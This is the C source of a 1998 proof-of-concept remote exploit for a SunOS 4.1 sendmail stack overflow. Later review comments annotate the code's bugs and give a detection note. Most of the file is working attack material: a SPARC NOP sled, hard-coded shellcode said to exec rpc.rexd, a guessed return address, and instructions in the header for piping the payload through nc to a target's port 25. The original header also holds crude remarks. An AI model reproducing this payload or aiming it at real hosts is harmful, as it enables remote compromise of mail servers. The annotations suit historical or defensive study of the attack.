- /*
- * Overflow for Sunos 4.1 sendmail - execs /usr/etc/rpc.rexd.
- * If you don't know what to do from there, kill yourself.
- * Remote stack pointer is guessed, the offset from it to the code is 188.
- *
- * Use: smrex buffersize padding |nc hostname 25
- *
- * where `padding` is a small integer, 1 works on my sparc 1+
- *
- * I use smrex 84 1, play with the numbers and see what happens. The core
- * gets dumped in /var/spool/mqueue if you fuck up, fire up adb, hit $r and
- * see where your offsets went wrong :)
- *
- * I don't *think* this is the 8lgm syslog() overflow - see how many versions
- * of sendmail this has carried over into and let me know. Or don't, I
- * wouldn't :)
- *
- * P.S. I'm *sure* there are cleverer ways of doing this overflow. So sue
- * me, I'm new to this overflow business..in my day everyone ran YPSERV and
- * things were far simpler... :)
- *
- * The Army of the Twelve Monkeys in '98 - still free, still kicking arse.
- */
-
- #include <stdio.h>
-
- /*
-  * Historical (1998) proof-of-concept: builds a stack-overflow payload for
-  * SunOS 4.1 sendmail and writes it to stdout as two SMTP lines ("helo" and
-  * "mail from:"). The program itself never opens a socket; the header above
-  * shows it being piped into nc.
-  *
-  * argv[1]  number of 32-bit filler words placed before the saved-%fp slot.
-  * argv[2]  number of 'A' bytes of alignment padding printed ahead of them.
-  *
-  * Review notes on the code as written (left byte-for-byte unchanged here):
-  *  - argv[1] is passed to atoi() before argc is checked, and argv[2] is
-  *    never checked at all, so a run with too few arguments dereferences a
-  *    NULL argv entry instead of printing the usage line.
-  *  - `padding` is never initialised before strcat() appends to it, so its
-  *    initial contents are indeterminate, and nothing bounds argv[2] against
-  *    its 50-byte size.
-  *  - atoi(), exit() and strcat() are called without <stdlib.h>/<string.h>,
-  *    i.e. via implicit declarations (removed from the language in C99).
-  *  - `offset` is assigned but never read.
-  *  - large_string is an array of `long unsigned int` handed to printf as a
-  *    %s argument, so its raw bytes are emitted as a C string: the word width
-  *    and byte order of the *build* host decide what actually goes out
-  *    (presumably written for a 32-bit big-endian SPARC build host - TODO
-  *    confirm). The only terminator is the zero word stored at index
-  *    prelude + 88, and no check keeps that index inside the 10000 words.
-  *  - main() falls off the end without a return statement, so the exit
-  *    status is unspecified under the C89 rules this code predates.
-  *
-  * Detection note: the "mail from:" line this emits carries long runs of
-  * non-ASCII bytes in the SMTP envelope, which is the characteristic a rule
-  * for this class of attack would key on.
-  */
- int main(int argc, char **argv)
- {
- long unsigned int large_string[10000];
- int i, prelude;
- unsigned long offset;
- char padding[50];
-
- offset = 188; /* Magic numbers */ /* never used below; see header note */
- prelude = atoi(argv[1]); /* argv[1] is dereferenced before argc is checked */
-
- if (argc < 2)
- {
- printf("Usage: %s bufsize <alignment offset> | nc target 25\n",
- argv[0]);
- exit(1);
- }
-
- /* Appends atoi(argv[2]) 'A' bytes to the (uninitialised) padding buffer;
-  * starting i at 6 does not change the count. argc >= 3 is never verified. */
- for (i = 6; i < (6 + atoi(argv[2])); i++)
- {
- strcat(padding, "A");
- }
- /* Filler words up to the frame-pointer slot; the value is the author's
-  * choice of an "illegal instruction" pattern so a mis-aimed return faults
-  * rather than executing silently. */
- for(i = 0; i < prelude; i++)
- {
- large_string[i] = 0xfffffff0; /* Illegal instruction */
- }
-
- /* Word that lands on the saved frame pointer (per the author's comment). */
- large_string[prelude] = 0xf7ffef50; /* Arbitrary overwrite of %fp */
-
- /* Word that lands on the saved return address; the header says this is a
-  * guessed stack address, tuned per machine. */
- large_string[prelude + 1] = 0xf7fff00c; /* Works for me; address of code */
-
- /* 62 words of the same instruction form a landing zone ("NOP sled") so
-  * the guessed address only has to fall somewhere inside it. */
- for( i = (prelude + 2); i < (prelude + 64); i++)
- {
- large_string[i] = 0xa61cc013; /* Lots of sparc NOP's */
- }
-
- /* Now the sparc execve /usr/etc/rpc.rexd code.. */
- /* Opaque machine-code words; their meaning is the author's claim above
-  * and is not decoded here. */
-
- large_string[prelude + 64] = 0x250bcbc8;
- large_string[prelude + 65] = 0xa414af75;
- large_string[prelude + 66] = 0x271cdc88;
- large_string[prelude + 67] = 0xa614ef65;
- large_string[prelude + 68] = 0x291d18c8;
- large_string[prelude + 69] = 0xa8152f72;
- large_string[prelude + 70] = 0x2b1c18c8;
- large_string[prelude + 71] = 0xaa156e72;
- large_string[prelude + 72] = 0x2d195e19;
- large_string[prelude + 73] = 0x900b800e;
- large_string[prelude + 74] = 0x9203a014;
- large_string[prelude + 75] = 0x941ac00b;
- large_string[prelude + 76] = 0x9c03a104;
- large_string[prelude + 77] = 0xe43bbefc;
- large_string[prelude + 78] = 0xe83bbf04;
- large_string[prelude + 79] = 0xec23bf0c;
- large_string[prelude + 80] = 0xdc23bf10;
- large_string[prelude + 81] = 0xc023bf14;
- large_string[prelude + 82] = 0x8210203b;
- large_string[prelude + 83] = 0xaa103fff;
- large_string[prelude + 84] = 0x91d56001;
- large_string[prelude + 85] = 0xa61cc013;
- large_string[prelude + 86] = 0xa61cc013;
- large_string[prelude + 87] = 0xa61cc013;
- large_string[prelude + 88] = 0; /* zero word: the only string terminator for the %s below */
-
- /* And finally, the overflow..simple, huh? :) */
- /* large_string is printed through %s, i.e. read as raw bytes; no bounds
-  * check relates prelude + 88 to the array size. */
- printf("helo\n");
- printf("mail from: %s%s\n", padding, large_string);
- }
- /* www.hack.co.za [2000]*/